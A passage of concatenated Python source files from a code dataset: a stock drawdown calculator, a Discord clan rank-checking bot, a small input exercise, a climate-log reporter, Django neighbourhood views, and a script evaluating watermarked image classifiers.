\n    if len(mdd_latest_date) != 0:\n        mdd_latest_date = mdd_latest_date[0][0]\n    else:\n        mdd_latest_date = '20000101'\n\n    # pull data starting two years (plus a buffer month) before the most recent date\n    from_date = str(datetime.strptime(mdd_latest_date, '%Y%m%d').date() - timedelta(days=365 * 2 + 30)).replace(\"-\", \"\")\n\n    # extract the price data for the required period\n    price = pd.DataFrame(\n        exec_query(f'select `stock_cd`, `date`, `price` from stock_db.d_stock_price where date > {from_date}'))\n    price.columns = ['stock_cd', 'date', 'price']\n\n    return price, mdd_latest_date\n\n\ndef cal_mdd(stock_pr, month):\n    \"\"\" Given a series of stock prices, return the MDD over each n-month window \"\"\"\n    mdd = []\n\n    for i in range(len(stock_pr) - (21 * month)):\n        price_part = stock_pr[i:(i + 21 * month + 1)]\n        try:\n            max_price = max(price_part)\n            min_price = min(price_part)\n            mdd_part = (min_price - max_price) / max_price\n        except Exception:\n            mdd_part = None\n        mdd += [mdd_part]\n\n    return mdd\n\n\ndef cal_mdd2(price_wide, month, mdd_latest_date):\n    \"\"\" Apply cal_mdd column-wise to the df and return the result in tidy form \"\"\"\n\n    from_index = int(np.where(price_wide.index == mdd_latest_date)[0]) - 21 * month\n    price_wide = price_wide.iloc[from_index:, ]\n\n    mdd_wide = price_wide.apply(lambda x: cal_mdd(x, month), axis=0, result_type='expand')\n    mdd_wide.index = price_wide.tail(len(mdd_wide)).index\n    mdd_long = mdd_wide.reset_index().melt(id_vars=\"date\", var_name=\"stock_cd\", value_name=\"mdd\").dropna()\n    mdd_long = mdd_long[['stock_cd', 'date', \"mdd\"]]\n    colname = \"mdd_\" + str(month) + \"m\"\n    mdd_long = mdd_long.rename(columns={'mdd': colname})\n\n    return mdd_long\n\n\ndef return_mdd_set(price, mdd_latest_date):\n    \"\"\" Return the MDD for every period that can be computed \"\"\"\n\n    price_wide = pd.pivot_table(price, values='price', index=['date'], columns=['stock_cd'])\n\n    mdd_1m = cal_mdd2(price_wide, 1, mdd_latest_date)\n    mdd_3m = cal_mdd2(price_wide, 3, mdd_latest_date)\n    mdd_6m = cal_mdd2(price_wide, 6, mdd_latest_date)\n    mdd_12m = cal_mdd2(price_wide, 12, mdd_latest_date)\n    mdd_24m = cal_mdd2(price_wide, 24, mdd_latest_date)\n\n    mdd_set = mdd_1m.merge(\n        mdd_3m, how='left', on=['stock_cd', 'date']).merge(\n        mdd_6m, how='left', on=['stock_cd', 'date']).merge(\n        mdd_12m, how='left', on=['stock_cd', 'date']).merge(\n        mdd_24m, how='left', on=['stock_cd', 'date'])\n\n    mdd_set = mdd_set.sort_values(by=['stock_cd', 'date'])\n\n    return mdd_set\n\n\ndef update_mdd_table():\n    \"\"\" Update the server DB (append only the MDD rows newer than the latest date already in the mdd table) \"\"\"\n\n    price, mdd_latest_date = load_required_df()\n\n    updated_mdd = return_mdd_set(price, mdd_latest_date)\n    updated_mdd = updated_mdd.loc[updated_mdd.date > mdd_latest_date, :]\n\n    return updated_mdd","repo_name":"HwangWonYoung/quant_project","sub_path":"update/mdd/mdd_updater.py","file_name":"mdd_updater.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"26076028381","text":"import zerobot_common\nfrom zerobot_common import gem_exceptions, gem_req_rank\nfrom member import valid_discord_id, valid_profile_link\n\n# what people type down -> what rankup they mean, in a format that works for\n# files and channel names.\nrank_parser = {\n\t\"leaders\" : \"leader\",\n\t\"staff_members\" : \"staff_member\",\n\t\"staff\" : \"staff_member\",\n\t\"masterclass_pvmers\" : \"masterclass_pvmer\",\n\t\"masterclass\" : \"masterclass_pvmer\",\n\t\"supreme_pvmers\" : \"supreme_pvmer\",\n\t\"supreme\" : \"supreme_pvmer\",\n\t\"pvm_specialist\" : \"pvm_specialist\",\n\t\"pvm_specialists\" : 
\"pvm_specialist\",\n\t\"pvm-specialist\" : \"pvm_specialist\",\n\t\"pvm-specialists\" : \"pvm_specialist\",\n\t\"pvm-spec\" : \"pvm_specialist\",\n\t\"pvm_spec\" : \"pvm_specialist\",\n\t\"specialist\" : \"pvm_specialist\",\n\t\"specialists\" : \"pvm_specialist\",\n\t\"spec\" : \"pvm_specialist\",\n \"captain\" : \"pvm_specialist\",\n \"elite_member\" : \"elite_member\",\n \"elite-member\" : \"elite_member\",\n \"elite_members\" : \"elite_member\",\n \"elite-members\" : \"elite_member\",\n \"elite\" : \"elite_member\",\n \"zer0_legend\" : \"zer0_legend\",\n \"zer0-legend\" : \"zer0_legend\",\n \"legend\" : \"zer0_legend\",\n \"zer0_hero\" : \"zer0_hero\",\n \"zer0-hero\" : \"zer0_hero\",\n \"hero\" : \"zer0_hero\",\n \"zer0_og\" : \"zer0_og\",\n \"zer0-og\" : \"zer0_og\",\n \"og\" : \"zer0_og\",\n \"pvm_expert\" : \"pvm_expert\",\n \"pvm-expert\" : \"pvm_expert\",\n \"pvm_experts\" : \"pvm_expert\",\n \"pvm-experts\" : \"pvm_expert\",\n \"expert-pvm\" : \"pvm_expert\",\n \"expert_pvm\" : \"pvm_expert\",\n \"experts_pvm\" : \"pvm_expert\",\n \"experts-pvm\" : \"pvm_expert\",\n \"experts\" : \"pvm_expert\",\n \"exp\" : \"pvm_expert\",\n \"expert\" : \"pvm_expert\",\n \"lieutenant\" : \"pvm_expert\",\n\t\"veteran_members\" : \"veteran_member\",\n\t\"veterans\" : \"veteran_member\",\n\t\"veteran\" : \"veteran_member\",\n\t\"sergeant\" : \"veteran_member\",\n\t\"advanced_members\" : \"advanced_member\",\n\t\"advanced\" : \"advanced_member\",\n\t\"corporal\" : \"advanced_member\",\n\t\"full member\" : \"member\",\n\t\"full\" : \"member\",\n\t\"member\" : \"member\",\n\t\"join\" : \"member\",\n\t\"entry\" : \"member\",\n\t\"novice\" : \"member\",\n\t\"recruit\" : \"member\",\n \"guest\" : \"Guest\",\n \"waiting\" : \"waiting_approval\",\n \"approval\" : \"waiting_approval\"\n}\n\n# clear rankup name format -> what actual discord ranks belong to them.\ndiscord_rank_parser = {\n\t\"leader\" : \"Leaders\",\n\t\"staff_member\" : \"Staff Member\",\n\t\"masterclass_pvmer\" : \"MasterClass PvMer\",\n\t\"supreme_pvmer\" : \"Supreme PvMer\",\n\t\"pvm_specialist\" : \"PvM Specialists\",\n \"elite_member\" : \"Elite Member\",\n \"legend\" : \"Zer0 Legend\",\n \"zer0_hero\" : \"Zer0 Hero\",\n \"zer0_og\" : \"Zer0 OG\",\n \"pvm_expert\" : \"PvM Expert\",\n\t\"veteran_member\" : \"Veteran Member\",\n\t\"advanced_member\" : \"Advanced Member\",\n\t\"member\" : \"Member\",\n \"guest\" : \"Guest\",\n \"waiting_approval\" : \"Waiting Approval\"\n}\n\n# discord ranks that can not be applied for, like admin or special ones\ndisallowed_rankups = {\n \"Leaders\",\n \"Clan Issues\",\n \"PvM Coordinator\",\n \"Elite Member\",\n \"Zer0 OG\",\n \"Zer0 Legend\",\n \"Zer0 Hero\",\n}\n\nmatch_disc_ingame = {\n \"Leaders\" : [\"Owner\",\"Deputy Owner\",\"Overseer\"],\n \"Clan Issues\" : [\"Coordinator\"],\n \"PvM Coordinator\" : [\"Coordinator\"],\n \"Retired Leader\" : [\"Coordinator\"],\n\t\"Staff Member\" : [\"Organiser\"],\n\t\"MasterClass PvMer\" : [\"Admin\"],\n\t\"Supreme PvMer\" : [\"General\"],\n\t\"PvM Specialists\" : [\"Captain\"],\n\t\"Elite Member\" : [\"Captain\"],\n\t\"Zer0 Legend\" : [\"Lieutenant\"],\n\t\"Zer0 OG\" : [\"Lieutenant\"],\n\t\"PvM Expert\" : [\"Lieutenant\"],\n\t\"Veteran Member\" : [\"Sergeant\"],\n\t\"Advanced Member\" : [\"Corporal\"],\n\t\"Member\" : [\"Recruit\"],\n \"Clan Friends/Allies\" : [],\n \"Guest\" : [],\n \"Waiting Approval\" : []\n}\n\n# rank matching if shivtr site is connected.\n# adding \"\" = not having a site account is allowed as match\nmatch_disc_site = {\n \"Leaders\" : 
[\"\",\"Leader\",\"Co-Leader\"],\n \"Clan Issues\" : [\"\",\"Clan Issues\"],\n \"PvM Coordinator\" : [\"\",\"Clan-Coordinator\"],\n\t\"Staff Member\" : [\"\",\"Staff Member\"],\n\t\"MasterClass PvMer\" : [\"\",\"MasterClass PvMer\"],\n\t\"Supreme PvMer\" : [\"\",\"Supreme PvMer\"],\n\t\"PvM Specialists\" : [\"\",\"PvM Specialists\"],\n\t\"Elite Member\" : [\"\",\"Elite Member\"],\n\t\"Zer0 Legend\" : [\"\",\"Veteran Member\"],\n\t\"Zer0 OG\" : [\"\",\"Veteran Member\"],\n\t\"PvM Expert\" : [\"\",\"PvM Expert\"],\n\t\"Veteran Member\" : [\"\",\"Veteran Member\"],\n\t\"Advanced Member\" : [\"\",\"Advanced Member\"],\n\t\"Member\" : [\"\",\"Recruit\"],\n \"Clan Friends/Allies\" : [\"\",\"Registered Guest\",\"Retired member\"],\n \"Guest\" : [\"\",\"Registered Guest\",\"Retired member\"],\n \"Waiting Approval\" : [\"\"]\n}\n\n# dpm tags, lowest at top (highest rank = highest index in dict)\nmage_dpm_tags = {\n 590922060193071118: \"850k Mage\",\n 590923162410024980: \"1000k Mage\",\n 590923449162006553: \"1150k Mage\",\n 590924385452556309: \"1300k Mage\",\n 976180300080119828: \"1450k Mage\",\n 976180827455103046: \"1600k Mage\",\n 976181411969134622: \"1750k Mage\",\n 976215930453504101: \"1900k Mage\"\n}\nmelee_dpm_tags = {\n 590922131366477824: \"850k Melee\",\n 590923236603199509: \"1000k Melee\",\n 590923501930545181: \"1150k Melee\",\n 590924439604953139: \"1300k Melee\",\n 976180296049381396: \"1450k Melee\",\n 976180824296800266: \"1600k Melee\",\n 997410847125147688: \"1750k Melee\",\n 997411137979170857: \"1900k Melee\"\n}\nrange_dpm_tags = {\n 590921829204623381: \"850k Range\",\n 590923065622528000: \"1000k Range\",\n 590923403377246208: \"1150k Range\",\n 590924088852217856: \"1300k Range\",\n 976180303053877309: \"1450k Range\",\n 976180830340792380: \"1600k Range\",\n 997411463167746318: \"1750k Range\",\n 997411302785941664: \"1900k Range\"\n}\n\nboss_tags = {\n 674321943247192075,\n 674321787886239779,\n 674322127125479429,\n 808332092823961641,\n 674321305495142452,\n 674321662669488128,\n 674321502082170881,\n 538377429891153920,\n 538377295799386122,\n 538377787803697162,\n 538377081097289730,\n 796009482613162014,\n 796009708275236904,\n 796009893249286195,\n 786653923174907935,\n 538377910533226536,\n 538377553753407488,\n 893774649035468810,\n 893774207337521182,\n 620706392352751627,\n 620706827855986698,\n 634848100900405248,\n 786653717029847060,\n 474659531847237662,\n 761563102697095168,\n 761563422457593876,\n 761562722520268810,\n 761563345370873877,\n 796009428561166376,\n 796009634867052564,\n 796009809367269416,\n 761564324777951272,\n 761564190120476682,\n 893774431120412673,\n 893774921015111690,\n 786653656438931486,\n 761563185026826270,\n 761562491892400138,\n 761563005778526218,\n 761562895669788692,\n 761563271677214730,\n 761563508289962024,\n 796009326095368202,\n 796009582744698940,\n 796009760926203944,\n 761564244901888000,\n 761564152468078632,\n 893774487294734336,\n 893774925976977430,\n}\n\ndef update_discord_info(_memberlist):\n \"\"\"\n Checks discord roles and dpm tags for each member in the memberlist and updates them to the highest rank.\n \"\"\"\n # loop through memberlist\n for memb in _memberlist :\n # skip if discord id invalid\n if not valid_discord_id(memb.discord_id): continue\n usr = zerobot_common.guild.get_member(memb.discord_id)\n # skip if usr not found, keep old rank & discord id, set name as left discord to indicate\n # \"Not in clan discord\" = exception for old people who never joined / people who cant join\n if (usr == 
None):\n memb.discord_name = \"Left clan discord\"\n continue\n\n # update discord name\n memb.discord_name = usr.name\n\n # update dpm tags\n memb.passed_gem = False\n highest_mage = -1\n highest_melee = -1\n highest_range = -1\n memb.misc[\"highest_mage\"] = \"\"\n memb.misc[\"highest_melee\"] = \"\"\n memb.misc[\"highest_range\"] = \"\"\n for r in usr.roles:\n if r.id in mage_dpm_tags:\n memb.passed_gem = True\n index = list(mage_dpm_tags.keys()).index(r.id)\n if index > highest_mage:\n memb.misc[\"highest_mage\"] = r.name\n highest_mage = index\n if r.id in melee_dpm_tags:\n memb.passed_gem = True\n index = list(melee_dpm_tags.keys()).index(r.id)\n if index > highest_melee:\n memb.misc[\"highest_melee\"] = r.name\n highest_melee = index\n if r.id in range_dpm_tags:\n memb.passed_gem = True\n index = list(range_dpm_tags.keys()).index(r.id)\n if index > highest_range:\n memb.misc[\"highest_range\"] = r.name\n highest_range = index\n\n # update highest discord rank\n highest_role = zerobot_common.highest_role(usr)\n if highest_role is not None:\n memb.discord_rank = highest_role.name\n # previous rank info kept if new rank unknown?\n\n # store all current discord role ids.\n discord_roles = []\n for r in usr.roles:\n discord_roles.append(r.id)\n memb.misc[\"discord_roles\"] = discord_roles\n\ndef TodosJoinDiscord(memberlist):\n response = list()\n for memb in memberlist:\n # no discord id, and never manually entered name\n if not valid_discord_id(memb.discord_id):\n response.append(f\"{memb.name}\\n\")\n response = [f\"**Need to join discord or need a discord id update on sheet:** {len(response)}\\n\"] + response\n return response\ndef rankInfo(member):\n msg = f\" {member.name_fixed_length()} - entry id {member.entry_id}: \"\n discord_rank = member.discord_rank\n if (member.discord_rank == \"\"):\n discord_rank = \"Unknown\"\n msg += f\"ingame: {member.rank}, discord: {discord_rank}\"\n if zerobot_common.site_enabled:\n site_rank = member.site_rank\n if (member.site_rank == \"\"):\n site_rank = \"Unknown\"\n msg += f\", site: {site_rank}\"\n msg += f\", passed gem: {member.passed_gem}\\n\"\n return msg\ndef TodosUpdateRanks(memberlist):\n _need_rank_update = list()\n for memb in memberlist:\n # find minimum rank for gem, can set as -1 for no gem req\n if gem_req_rank == None:\n gem_req_disc_rank = -1\n else:\n gem_req_disc_rank = list(match_disc_ingame.keys()).index(gem_req_rank)\n try:\n discord_rank = list(match_disc_ingame.keys()).index(memb.discord_rank)\n except ValueError:\n # cant find their rank in the list -> needs a rank.\n _need_rank_update.append(memb)\n continue\n # no gem, gem req for their rank, rank or name not in gem exceptions.\n if not memb.passed_gem and discord_rank <= gem_req_disc_rank:\n if not(memb.discord_rank in gem_exceptions or memb.name in gem_exceptions):\n _need_rank_update.append(memb)\n continue\n # site rank does not match discord rank\n if zerobot_common.site_enabled:\n if not memb.site_rank in match_disc_site[memb.discord_rank]:\n _need_rank_update.append(memb)\n continue\n # ingame rank does not match discord rank\n if not memb.rank in match_disc_ingame[memb.discord_rank]:\n _need_rank_update.append(memb)\n continue\n # build up response\n response = list()\n for memb in _need_rank_update:\n response.append(rankInfo(memb))\n response = [f\"Need a rank update: {len(response)}\\n\"] + response\n return response\ndef TodosInviteIngame(memberlist):\n response = list()\n for memb in memberlist:\n # no discord id, and never manually entered name\n if 
(memb.rank == \"needs invite\"):\n response.append(f\"{memb.name}\\n\")\n response = [f\"**Need to be invited ingame:** {len(response)}\\n\"] + response\n return response\n\ndef Todos(_memberlist, *args):\n \"\"\"\n Finds tasks by looking at inconsistencies in the memberlist.\n Assumes the memberlist is up to date with latest info.\n \"\"\"\n _no_discord = list()\n _no_site = list()\n _no_gem = list()\n for memb in _memberlist:\n # no valid site profile\n if not valid_profile_link(memb.profile_link):\n _no_site.append(memb)\n # no valid discord id, or no longer on discord\n if not valid_discord_id(memb.discord_id) or memb.discord_name == \"Left clan discord\":\n _no_discord.append(memb)\n # not passed gem, and listed to get rankup with gem = need gem\n if not memb.passed_gem:\n _no_gem.append(memb)\n response = list()\n if (len(args) != 1):\n response.append(\"**To do lists:**\\n\")\n response += TodosJoinDiscord(_memberlist)\n response += TodosInviteIngame(_memberlist)\n response += TodosUpdateRanks(_memberlist)\n message = f\"\\n- not on discord: {len(_no_discord)}\\n\"\n message += f\"- not on clan site: {len(_no_site)}\\n\"\n message += f\"- no gem : {len(_no_gem)}\\n\"\n message += f\"\\nYou can add one of these after `-zbot todos ` to get more details: `nodiscord`, `nosite`, `nogem`\"\n response.append(message)\n return response\n if (len(args) == 1):\n if (args[0] == \"nodiscord\"):\n response.append(\"\\n\\nThese are not on the clan discord:\\n\")\n for memb in _no_discord:\n response.append(f\"{memb.name}\\n\")\n return response\n if (args[0] == \"nosite\"):\n response.append(\"\\n\\nThese are not on the clan website:\\n\")\n for memb in _no_site:\n response.append(f\"{memb.name}\\n\")\n return response\n if (args[0] == \"nogem\"):\n response.append(\"\\n\\nThese still need to pass a gem:\\n\")\n for memb in _no_gem:\n response.append(f\"{memb.name}\\n\")\n return response\n response.append(\"\\n\\nNeeds to `-zbot todos ` plus one of : `nodiscord`, `nosite`, `nogem`\")\n return response","repo_name":"ErikMekkes/ZeroBot","sub_path":"rankchecks.py","file_name":"rankchecks.py","file_ext":"py","file_size_in_byte":13844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15893689746","text":"names=[]\r\nages=[]\r\nemails=[]\r\nfor counter in range(0,3):\r\n name=input(\"Enter name\")\r\n age=input(\"Enter age\")\r\n email=input(\"Enter email\")\r\n\r\n names.insert(counter,name)\r\n ages.insert(counter, age)\r\n emails.insert(counter, email)\r\n\r\nprint(names)\r\nprint(ages)\r\nprint(emails)","repo_name":"Debolina136208/python","sub_path":"Day1Assignments/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43993295241","text":"#!/usr/bin/python3\n# -*- coding: utf8 -*-\nimport os\nimport time\nimport pandas as pd\nimport numpy as np\n\n\ndef procesa_datos(archivo_log):\n\n df = pd.read_csv(archivo_log, sep= \";\", header=None)\n df.columns= ['Fecha','Hora','Temperatura','Humedad','Ventilador','Extractor','Luz']\n\n #guardamos variable fecha\n del(df['Fecha'])\n\n #cambiamos tipo de variables\n df = df.astype({\"Ventilador\":'object', \"Extractor\":'object', \"Luz\":'object'})\n\n\n #cambiando 1 y 0 por On y Off\n df.loc[df['Ventilador'] == 1, 'Ventilador'] = 'On'\n df.loc[df['Ventilador'] == 0, 'Ventilador'] = 'Off'\n df.loc[df['Extractor'] == 1, 'Extractor'] = 'On'\n df.loc[df['Extractor'] == 0, 
\n\n    temp_min = np.amin(df['Temperatura'])\n    temp_max = np.amax(df['Temperatura'])\n    temp_media = int(round(np.mean(df['Temperatura']), 1))\n\n    hum_min = int(np.amin(df['Humedad']))\n    hum_max = int(np.amax(df['Humedad']))\n    hum_media = int(round(np.mean(df['Humedad']), 1))\n\n    if len(df) > 2:\n        prop_vent = int(round( (len(df.loc[ df['Ventilador'] == \"On\"]) / len(df) * 100) , 1))\n        prop_ext = int(round( (len(df.loc[ df['Extractor'] == \"On\"]) / len(df) * 100) , 1))\n    else:\n        prop_vent = \"-\"\n        prop_ext = \"-\"\n\n    return temp_min, temp_max, temp_media, hum_min, hum_max, hum_media, prop_vent, prop_ext\n\n\n\ndef reporte():\n    archivo_log = \"/home/pi/freshgrowpi/log/log_clima_\" + time.strftime(\"%d-%m-%y\") + \".csv\"\n\n    if os.path.isfile(archivo_log) == False:\n        #print(\"Error opening LOG file\")\n        temp_max = \"0\"\n        temp_min = \"0\"\n        temp_media = \"0\"\n        hum_max = \"0\"\n        hum_min = \"0\"\n        hum_media = \"0\"\n        prop_vent = \"0\"\n        prop_ext = \"0\"\n\n        return temp_min, temp_max, temp_media, hum_min, hum_max, hum_media, prop_vent, prop_ext\n\n    else:\n        variables = procesa_datos(archivo_log)\n        return variables\n#reporte()\n","repo_name":"J0seca/freshgrowpi","sub_path":"flask/bin/flask_reporte.py","file_name":"flask_reporte.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"37101784243","text":"\nfrom multiprocessing import context\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom mtaani.models import *\nfrom .forms import *\n\n# Create your views here.\n\ndef homepage(request):\n    title = \"homepage\"\n    all_hoods = Neighbourhood.objects.all()\n    context = {\n        \"title\": title,\n        \"all_hoods\": all_hoods,\n    }\n    return render(request, 'all-pages/homepage.html',context)\n\n@login_required\ndef profile(request):\n    # fetch the Profile linked to the logged-in user (via Profile.profile_user, see edit_profile below)\n    user_profile = get_object_or_404(Profile, profile_user=request.user)\n    context = {\n        \"profile\": user_profile,\n    }\n    return render(request, 'all-pages/profile.html', context)\n\n\n@login_required\ndef edit_profile(request,user_id):\n    user=get_object_or_404(User,id=user_id)\n    form = UpdateProfileForm()\n    if request.method == 'POST':\n        form = UpdateProfileForm(request.POST,request.FILES)\n        if form.is_valid():\n            post_profile=form.save(commit=False)\n            post_profile.profile_user=user\n            form.save()\n            return redirect('profile')\n    else:\n        form = UpdateProfileForm()\n    return render(request, 'all-pages/edit_profile.html', {'form': form})\n\n@login_required\ndef create_new_hood(request):\n    #current_user=request.user\n    form = NeighbourhoodForm()\n    if request.method == 'POST':\n        form = NeighbourhoodForm(request.POST, request.FILES)\n        if form.is_valid():\n            hood = form.save(commit=False)\n            hood.neighbourhood_admin = request.user\n            hood.save()\n            return redirect('hood')\n    else:\n        form = NeighbourhoodForm()\n    return render(request, 'all-pages/new_hood.html', {'form': form})\n\ndef hoods(request):\n    all_hoods = Neighbourhood.objects.all()\n    all_hoods = all_hoods[::-1]\n    context = {\n        'all_hoods': all_hoods,\n    }\n    return render(request, 'all-pages/all_hoods.html', context)\n\n@login_required\ndef add_business(request):\n    form = BusinessForm()\n    if request.method == 'POST':\n        form = BusinessForm(request.POST, request.FILES)\n        if form.is_valid():
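\n            # commit=False returns an unsaved instance so the owner can be attached before the row is written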
\n            business = form.save(commit=False)\n            business.business_user = request.user\n            business.save()\n            return redirect('business')\n    else:\n        form = BusinessForm()\n    # render (not redirect) so the form is shown again on GET or invalid input\n    return render(request, 'all-pages/business.html', {\"form\": form})\n\n@login_required\ndef join_hood(request, id):\n    neighbourhood = get_object_or_404(Neighbourhood, id=id)\n    request.user.profile.profile_neighbourhood = neighbourhood\n    request.user.profile.save()\n    return redirect('hood')\n\n@login_required\ndef leave_hood(request, id):\n    get_object_or_404(Neighbourhood, id=id)\n    # clearing the field removes the user from the neighbourhood\n    request.user.profile.profile_neighbourhood = None\n    request.user.profile.save()\n    return redirect('hood')\n\n@login_required\ndef hood_members(request, post_neighbourhood_id):\n    hood = Neighbourhood.objects.get(id=post_neighbourhood_id)\n    members = Profile.objects.filter(profile_neighbourhood=hood)\n    return render(request, 'all-pages/members.html', {'members': members})\n\ndef single_hood(request, post_neighbourhood_id):\n    hood = Neighbourhood.objects.get(id=post_neighbourhood_id)\n    business = Business.objects.filter(business_neighbourhood=hood)\n    posts = Post.objects.filter(post_neighbourhood = hood)\n    if request.method == 'POST':\n        form = BusinessForm(request.POST)\n        if form.is_valid():\n            bsn_form = form.save(commit=False)\n            bsn_form.business_neighbourhood = hood\n            bsn_form.business_user = request.user.profile\n            bsn_form.save()\n            return redirect('single-hood', hood.id)\n    else:\n        form = BusinessForm()\n    context = {\n        'hood': hood,\n        'business': business,\n        'form': form,\n        'posts': posts,\n    }\n    return render(request, 'all-pages/single-hood.html', context)\n\ndef create_post(request, post_neighbourhood_id):\n    hood = Neighbourhood.objects.get(id=post_neighbourhood_id)\n    if request.method == 'POST':\n        form = NewPostForm(request.POST)\n        if form.is_valid():\n            new_post = form.save(commit=False)\n            new_post.post_neighbourhood = hood\n            new_post.post_user = request.user.profile\n            new_post.save()\n            return redirect('single-hood', hood.id)\n    else:\n        form = NewPostForm()\n    return render(request, 'all-pages/post.html', {'form': form})\n\ndef search_business(request):\n    if request.method == 'GET':\n        business_name = request.GET.get('post_title')\n        results = Business.objects.filter(business_name__icontains=business_name).all()\n        display_message = f'{business_name}'\n        \n        context = {\n            'results': results,\n            'display_message': display_message\n        }\n        return render (request, 'all-pages/search-results.html', context)\n    else:\n        display_message = \" You have not searched for any business\"\n        return render (request,'all-pages/search-results.html', {'display_message': display_message})\n\ndef search_all_business(request):\n    if request.method == 'GET':\n        business_name = request.GET.get('title')\n        results = Business.objects.filter(business_name__icontains=business_name).all()\n        display_message = f'{business_name}'\n        \n        context = {\n            'results': results,\n            'display_message': display_message\n        }\n        return render (request, 'all-pages/search-results.html', context)\n    else:\n        display_message = \" You have not searched for any business\"\n        return render (request,'all-pages/search-results.html', {'display_message': display_message})","repo_name":"KellyKiiru/django-ip4","sub_path":"mtaani/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"34322131759","text":"\"\"\" This script trains null models given a configuration file (see configs) \"\"\"\n\nimport argparse\n\nimport mlconfig\nimport torch\n\nimport os\n\nfrom tqdm import 
tqdm\n\nfrom wrt.utils import reserve_gpu\n\nimport numpy as np\n\n# Registers all hooks. Do not remove.\nfrom wrt.classifiers import PyTorchClassifier\nfrom wrt.defenses import Watermark\nfrom wrt.training.utils import compute_accuracy\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-w', '--wm_config', type=str, default='configs/imagenet/wm_configs/jia.yaml',\n help=\"Path to config file for the watermarking scheme.\")\n parser.add_argument('--no-cuda', action='store_true')\n parser.add_argument('--best', action='store_true')\n parser.add_argument(\"--gpu\", type=str, default=None, help=\"Which GPU to use. Defaults to GPU with least memory.\")\n parser.add_argument(\"--pretrained_dir\", default=\"outputs/imagenet/wm/jia/00013_jia\")\n return parser.parse_args()\n\n\ndef __load_model(model, optimizer, image_size, num_classes, pretrained_dir: str = None,\n best=False, load_optimizer=False):\n \"\"\" Loads a source model from a directory and wraps it into a pytorch classifier.\n \"\"\"\n criterion = torch.nn.CrossEntropyLoss()\n\n if pretrained_dir:\n print(f\"Loading source model from '{pretrained_dir}'.\")\n for file in os.listdir(pretrained_dir):\n if best:\n if file.endswith(\".pth\"):\n model.load_state_dict(torch.load(os.path.join(pretrained_dir, file))[\"model\"])\n print(f\"Loaded model '{file}'\")\n elif file.endswith(\".model\"):\n model.load_state_dict(torch.load(os.path.join(pretrained_dir, file)))\n print(f\"Loaded model '{file}'\")\n\n if load_optimizer and file.endswith(\".optimizer\"):\n optimizer.load_state_dict(torch.load(os.path.join(pretrained_dir, file)))\n print(f\"Loaded optimizer '{file}'.\")\n\n model = PyTorchClassifier(\n model=model,\n clip_values=(0, 1),\n loss=criterion,\n optimizer=optimizer,\n input_shape=(3, image_size, image_size),\n nb_classes=num_classes\n )\n return model\n\n\ndef evaluate_test_accuracy(predictor, val_data, learning_phase=False, batch_size=32, verbose=True, limit_batches=np.inf):\n accs = []\n val_loop = tqdm(enumerate(val_data), disable=not verbose, total=min(limit_batches, len(val_data)))\n for i, (x_batch, y_batch) in val_loop:\n if i >= limit_batches:\n break\n if len(accs) > 0:\n val_loop.set_description('Validation ({:.4f})'.format(sum(accs) / len(accs)))\n x_batch = x_batch.detach().clone().cpu().numpy()\n y_batch = y_batch.detach().clone().cpu().numpy()\n if len(y_batch.shape) > 1:\n y_batch = np.argmax(y_batch, axis=1)\n with torch.no_grad():\n accs.append(compute_accuracy(predictor.predict(x_batch, batch_size=batch_size, learning_phase=learning_phase), y_batch)[0])\n return sum(accs) / len(accs)\n\n\ndef compute_metrics(defense_instance, x_wm, y_wm, test_loader):\n source_model = defense_instance.get_classifier()\n\n test_acc = evaluate_test_accuracy(source_model, test_loader, limit_batches=50, learning_phase=False)\n wm_acc = compute_accuracy(source_model.predict(x_wm, learning_phase=True), y_wm)[0]\n return {\n \"wm_acc\": wm_acc,\n \"test_acc\": test_acc\n }\n\n\ndef main():\n # Takes more time at startup, but optimizes runtime.\n torch.backends.cudnn.benchmark = True\n\n args = parse_args()\n reserve_gpu(args.gpu)\n\n defense_config = mlconfig.load(args.wm_config)\n print(defense_config)\n\n source_model = defense_config.source_model()\n optimizer = defense_config.optimizer(source_model.parameters())\n # source_model.override_learning_phase = True\n\n source_model: PyTorchClassifier = __load_model(source_model,\n optimizer,\n best=True,\n load_optimizer=True,\n 
image_size=defense_config.source_model.image_size,\n                                                   num_classes=defense_config.source_model.num_classes,\n                                                   pretrained_dir=args.pretrained_dir)\n\n    valid_loader = defense_config.predict_dataset(train=False)\n\n    # Create the defense instance\n    defense: Watermark = defense_config.wm_scheme(source_model)\n\n    keys = np.load(os.path.join(args.pretrained_dir, \"secret_key.npz\"))\n    x_wm, y_wm = keys[\"x_wm\"], keys[\"y_wm\"]\n\n    # Outputs relevant for saving.\n    metrics: dict = compute_metrics(defense, x_wm, y_wm, valid_loader)\n\n    print(metrics)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"dnn-security/Watermark-Robustness-Toolbox","sub_path":"test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"83"}
